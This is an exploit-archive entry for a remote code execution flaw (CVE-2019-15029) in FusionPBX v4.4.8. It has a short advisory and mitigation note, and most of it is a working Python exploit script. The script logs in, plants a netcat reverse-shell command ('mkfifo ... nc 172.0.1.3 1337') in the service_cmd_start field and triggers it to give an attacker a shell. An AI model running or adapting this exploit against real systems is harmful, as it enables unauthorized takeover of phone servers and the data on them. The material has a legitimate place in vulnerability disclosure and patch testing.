FusionPBX v4.4.8 Remote Code Execution

vendor:

FusionPBX

by:

Askar

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: FusionPBX

Affected Version From: v4.4.8

Affected Version To: v4.4.8

Patch Exists: YES

Related CWE: 2019-15029

CPE: a:fusionpbx:fusionpbx

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04 / PHP 7.2

2019

FusionPBX v4.4.8 Remote Code Execution

FusionPBX is vulnerable to a Remote Code Execution vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a malicious payload to the vulnerable service_cmd_start parameter. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of FusionPBX.

Source

Exploit-DB raw data:

#!/usr/bin/python3

'''
# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")

    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]


request = requests.session()

login_info = {
    "username": username,
    "password": password
}

login_request = request.post(
    url+"/core/user_settings/user_dashboard.php",
     login_info, verify=False
 )


if "Invalid Username and/or Password" not in login_request.text:
    print("[+] Logged in successfully")
else:
    print("[+] Error with creds")

service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
    # the service name you want to create
    "service_name":"PwnedService3",
    "service_type":"pid",
    "service_data":"1",

    # this value contains the payload , you can change it as you want
    "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
    "service_cmd_stop":"stop",
    "service_description":"desc",
    "submit":"Save"
}

request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)

soup = BeautifulSoup(html_page.text, "lxml")

for a in soup.find_all(href=True):
    if "PwnedService3" in a:
        sid = a["href"].split("=")[1]
        break

service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)